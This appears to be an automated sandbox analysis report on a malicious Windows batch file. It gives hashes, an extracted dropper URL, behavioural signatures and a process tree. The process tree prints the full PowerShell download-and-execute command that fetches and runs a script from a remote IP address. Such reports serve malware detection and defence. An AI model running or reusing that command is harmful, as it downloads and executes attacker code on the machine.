ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e | Triage

Analysis

max time kernel
125s
max time network
153s
platform
windows10_x64
resource
win10v200430
submitted
15-05-2020 19:19

Sharing

Report Analysis Logs

General

Target

b692cd395a2db4aacd53de584ee06ea0.bat
Size

215B
MD5

7b613efb2eb2240a79c12ff83b16d370
SHA1

c74e994acea6c088e0590c14a99ccada44dd7c12
SHA256

ace21c38bbf5a81a0646d2f3d272bf7b43c84e248c3524bdcbb855c8594a0d6e
SHA512

7242a8a1d96558ffbc16b91b9a1dbd25a60396da43c9d46b0a57eecceee262bdde40cd44c507a122ee9567882de40c1c75514048b241e62181c0e5a67ea72024

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0

Signatures

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1544 1784 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 1544 WerFault.exe
Token: SeBackupPrivilege 1544 WerFault.exe
Token: SeDebugPrivilege 1544 WerFault.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

pid	process
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe
1544	WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b692cd395a2db4aacd53de584ee06ea0.bat"
1⤵
PID:1636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b692cd395a2db4aacd53de584ee06ea0');Invoke-IKBCFDVD;Start-Sleep -s 10000"
2⤵
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 704
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1544

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1544-0-0x0000000004F00000-0x0000000004F01000-memory.dmp

Filesize
4KB

Download
memory/1544-1-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download